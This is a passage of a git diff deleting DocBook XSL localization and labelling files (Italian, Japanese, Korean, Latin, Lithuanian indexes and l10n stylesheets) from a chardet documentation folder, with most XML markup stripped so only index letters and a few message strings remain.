ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/it.xml b/chardet/docs/docbook/xsl/common/it.xml deleted file mode 100644 index 9af7107..0000000 --- a/chardet/docs/docbook/xsl/common/it.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/ja.xml b/chardet/docs/docbook/xsl/common/ja.xml deleted file mode 100644 index aef28d3..0000000 --- a/chardet/docs/docbook/xsl/common/ja.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/ko.xml b/chardet/docs/docbook/xsl/common/ko.xml deleted file mode 100644 index ebbf832..0000000 --- a/chardet/docs/docbook/xsl/common/ko.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/l10n.dtd b/chardet/docs/docbook/xsl/common/l10n.dtd deleted file mode 100644 index 1d6f836..0000000 --- a/chardet/docs/docbook/xsl/common/l10n.dtd +++ /dev/null @@ -1,63 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/l10n.xml b/chardet/docs/docbook/xsl/common/l10n.xml deleted file mode 100644 index 583f219..0000000 --- a/chardet/docs/docbook/xsl/common/l10n.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -]> - -⁡ -&bg; -&bn; -&ca; -&cs; -&da; -&de; -⪙ -&en; -&es; -&et; -&eu; -&fi; -&fr; -&he; -&hu; -&id; -⁢ -&ja; -&ko; -&la; -&lit; -&nl; -&nn; -&no; -&pl; -&pt; -&pt_br; -&ro; -&ru; -&sk; -&sl; -&sr; -&sr_Latn; -&sv; -&th; -&tr; -&uk; -&vi; -&xh; -&zh_cn; -&zh_tw; - diff --git a/chardet/docs/docbook/xsl/common/l10n.xsl b/chardet/docs/docbook/xsl/common/l10n.xsl deleted file mode 100644 index ad6b323..0000000 --- a/chardet/docs/docbook/xsl/common/l10n.xsl +++ /dev/null @@ -1,451 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - _ - - - - - - - - - - - - - - - - - - - - No localization exists for " - - " or " - - ". Using default " - - ". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No " - - " localization of " - - " exists - - - . - - - ; using "en". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - bullet - - - - - - - - - - - - - - - - - - No " - - " localization of dingbat - - exists; using "en". - - - - - - - - - - startquote - - - - - - endquote - - - - - - nestedstartquote - - - - - - nestedendquote - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No " - - " localization exists. - - - - - - - - - - No context named " - - " exists in the " - - " localization. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No template for " - - " (or any of its leaves) exists -in the context named " - - " in the " - - " localization. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - 1 - - - - - - - - - - - - - - 0 - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/la.xml b/chardet/docs/docbook/xsl/common/la.xml deleted file mode 100644 index 3b4c07d..0000000 --- a/chardet/docs/docbook/xsl/common/la.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/labels.xsl b/chardet/docs/docbook/xsl/common/labels.xsl deleted file mode 100644 index 5df9eae..0000000 --- a/chardet/docs/docbook/xsl/common/labels.xsl +++ /dev/null @@ -1,618 +0,0 @@ - - - - - - - - - - -Provides access to element labels - -Processing an element in the -label.markup mode produces the -element label. -Trailing punctuation is not added to the label. - - - - - - . - - - - - - - Request for label of unexpected element: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - label.markup: this can't happen! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - a - i - A - I - - - - Unexpected numeration: - - - - - - - - - - - - - - - - - - - - - - -Returns true if $section should be labelled - -Returns true if the specified section should be labelled. -By default, this template simply returns $section.autolabel, but -custom stylesheets may override it to get more selective behavior. - - - - - - diff --git a/chardet/docs/docbook/xsl/common/lt.xml b/chardet/docs/docbook/xsl/common/lt.xml deleted file mode 100644 index 7a07116..0000000 --- a/chardet/docs/docbook/xsl/common/lt.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ 